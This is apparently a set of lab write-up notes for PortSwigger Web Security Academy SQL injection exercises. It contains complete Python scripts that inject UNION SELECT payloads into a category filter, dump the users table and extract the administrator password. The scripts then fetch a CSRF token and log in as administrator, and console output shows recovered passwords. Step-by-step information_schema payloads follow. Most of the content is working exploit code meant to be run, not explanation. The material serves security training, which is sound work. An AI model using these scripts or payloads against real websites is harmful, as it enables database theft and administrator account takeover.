proxies = {"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"} #proxies

we add a new automation script. it will be automate login as an administrator after it got an administrator password

$ python3 sqli_lab_05a.py "https://aca91fb91fc3b216c00c29bb00e70085.web-security-academy.net"

>> SQL injection UNION attack, retrieving data from other tables

>> by Port Swigger Academy

[*] Dumping the list of usernames and passwords...

[✓] The administrator password is 's35lhylr12py2yuvv2il'

[*] Try to login as an Administrator...

[✓] We have logged as an Administrator!

import requests

import sys

import urllib3

from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class Interface ():

def __init__ (self):

self.red = '\033[91m'

self.green = '\033[92m'

self.white = '\033[37m'

self.yellow = '\033[93m'

self.bold = '\033[1m'

self.end = '\033[0m'

def header(self):

print('\n >> SQL injection UNION attack, retrieving data from other tables')

print(' >> by Port Swigger Academy\n')

def info (self, message):

print(f"[{self.white}*{self.end}] {message}")

def warning (self, message):

print(f"[{self.yellow}!{self.end}] {message}")

def error (self, message):

print(f"[{self.red}x{self.end}] {message}")

def success (self, message):

print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")

global output

output = Interface()

output.header()

proxies = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}

def exploit_sqli_users_table(url):

username = 'administrator'

path = '/filter?category=Gifts'

sqli_payload = "' UNION SELECT username, password from users--"

r = requests.get(url+path+sqli_payload,verify=False,proxies=proxies)

soup = BeautifulSoup(r.text, 'html.parser')

admin_password = soup.body.find(text='administrator').parent.findNext('td').contents[0]

return admin_password

def get_csrf_token(s, url):

path = "/login"

response = s.get(url+path, verify=False, proxies=proxies)

soup = BeautifulSoup(response.text, 'html.parser')

csrf = soup.find("input")['value']

return csrf

def login_as_an_administrator(s, url, admin_password):

csrf = get_csrf_token(s, url)

path = "/login"

data = {"csrf": csrf, "username": "administrator", "password": admin_password}

response = s.post(url+path, data=data, verify=False, proxies=proxies)

if "Log out" in response.text:

return True

else:

return False

if __name__ == "__main__":

try:

url = sys.argv[1].strip()

except IndexError:

output.info("Usage: %s <url>" % sys.argv[0])

output.info("Example: %s www.example.com" % sys.argv[0])

sys.exit(-1)

output.info("Dumping the list of usernames and passwords...")

admin_password = exploit_sqli_users_table(url)

if admin_password:

output.success("The administrator password is '%s'" % admin_password)

output.info("Try to login as an Administrator...")

s = requests.Session()

if login_as_an_administrator(s, url, admin_password):

output.success("We have logged as an Administrator!")

else:

output.error("Did not login as an Administrator")

else:

output.error("Did not find and administrator password")

$ python3 sqli_lab_06b.py "https://acb91fb01e4afc7dc0d4991700de003a.web-security-academy.net"

>> SQL injection UNION attack, retrieving multiple values in a single column

>> by Port Swigger Academy

[*] Retrive dbms version...

[✓] Found the DBMS version.

[✓] The dbms version is 'PostgreSQL 12.10 (Ubuntu 12.10-0ubuntu0.20.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, 64-bit'

we add a new automation script. it will be automate login as an administrator after it got an administrator password

$ python3 sqli_lab_06a.py "https://ac521f9e1fedb276c0052dd800eb0002.web-security-academy.net"

[*] Dumping the list of usernames and passwords...

[✓] The administrator password is 'aeou73zrii41hkjpkwpi'

[*] Try to login as an administrator

[✓] We have logged as an Administrator!

sys.exit(-1)

import requests

import sys

import urllib3

from bs4 import BeautifulSoup

import re

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class Interface ():

def __init__ (self):

self.red = '\033[91m'

self.green = '\033[92m'

self.white = '\033[37m'

self.yellow = '\033[93m'

self.bold = '\033[1m'

self.end = '\033[0m'

def header(self):

print('\n >> SQL injection UNION attack, retrieving multiple values in a single column')

print(' >> by Port Swigger Academy\n')

def info (self, message):

print(f"[{self.white}*{self.end}] {message}")

def warning (self, message):

print(f"[{self.yellow}!{self.end}] {message}")

def error (self, message):

print(f"[{self.red}x{self.end}] {message}")

def success (self, message):

print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")

global output

output = Interface()

output.header()

proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

def exploit_sqli_users_table(url):

username = 'administrator'

path = '/filter?category=Gifts'

sqli_payload = "' UNION SELECT NULL, username || ':' || password FROM users--"

r = requests.get(url+path+sqli_payload,verify=False,proxies=proxies)

soup = BeautifulSoup(r.text, 'html.parser')

admin_password = soup.find(text=re.compile('.*administrator.*')).split(":")[1]

return admin_password

def get_csrf_token(s, url):

path = "/login"

response = s.get(url+path, verify=False, proxies=proxies)

soup = BeautifulSoup(response.text, 'html.parser')

csrf = soup.find("input")['value']

return csrf

def login_as_an_administrator(s, url, admin_password):

csrf = get_csrf_token(s, url)

path = "/login"

data = {"csrf": csrf, "username": "administrator", "password": admin_password}

response = s.post(url+path, data=data, verify=False, proxies=proxies)

if "Log out" in response.text:

return True

else:

return False

if __name__ == "__main__":

try:

url = sys.argv[1].strip()

except IndexError:

output.info("Usage: %s <url>" % sys.argv[0])

output.info("Example: %s www.example.com" % sys.argv[0])

sys.exit(-1)

output.info("Dumping the list of usernames and passwords...")

admin_password = exploit_sqli_users_table(url)

if admin_password:

output.success("The administrator password is '%s'" % admin_password)

output.info("Try to login as an administrator")

s = requests.Session()

if login_as_an_administrator(s, url, admin_password):

output.success("We have logged as an Administrator!")

else:

output.error("Did not login as an Administrator")

else:

output.error("Did not find an administrator password.")

Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.

You can query `information_schema.tables` to list the tables in the database:

This returns output like the following:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE

=====================================================

MyDatabase dbo Products BASE TABLE

MyDatabase dbo Users BASE TABLE

MyDatabase dbo Feedback BASE TABLE

This output indicates that there are three tables, called `Products`, `Users`, and `Feedback`.

You can then query `information_schema.columns` to list the columns in individual tables:

This returns output like the following:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME DATA_TYPE

=================================================================

MyDatabase dbo Users UserId int

MyDatabase dbo Users Username varchar

MyDatabase dbo Users Password varchar

This output shows the columns in the specified table and the data type of each column.

This lab contains an [SQL injection](https://portswigger.net/web-security/sql-injection) vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.

To solve the lab, log in as the `administrator` user.

1. Use Burp Suite to intercept and modify the request that sets the product category filter.

2. Determine the [number of columns that are being returned by the query](https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns) and [which columns contain text data](https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text). Verify that the query is returning two columns, both of which contain text, using a payload like the following in the `category` parameter:

`' ORDER BY 2--`

`' ORDER BY 2--`

`' UNION SELECT 'test', 'test'--`

`' UNION SELECT version(), NULL--`

from the version, we know the database version is using PostgreSQL

3. Use the following payload to retrieve the list of tables in the database:

`' UNION SELECT NULL, table_name FROM information_schema.tables--`

4. Find the name of the table containing user credentials.

5. Use the following payload (replacing the table name) to retrieve the details of the columns in the table:

`' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name = 'users_xtipdx'--`

6. Find the names of the columns containing usernames and passwords.

7. Use the following payload (replacing the table and column names) to retrieve the usernames and passwords for all users:

`' UNION SELECT username_qvmofd, password_ulzbnu FROM users_xtipdx--`

8. Find the password for the `administrator` user, and use it to log in.

$ python3 sqli_lab_09.py "https://ac161fc81ffce801c05f2341001d00b5.web-security-academy.net"

>> SQL injection attack, listing the database contents on non-Oracle databases

>> by Port Swigger Academy

[*] Looking for a users table...

[✓] Found the users table name: users_pvswrw

[✓] Found the username column name: username_jzkjtn

[✓] Found the password column name: password_vtubir

[✓] The administrator password is: acpcwbwsy4cki6wwhuk1

[*] Try to login as an Administrator...

[✓] We have logged as an Administrator!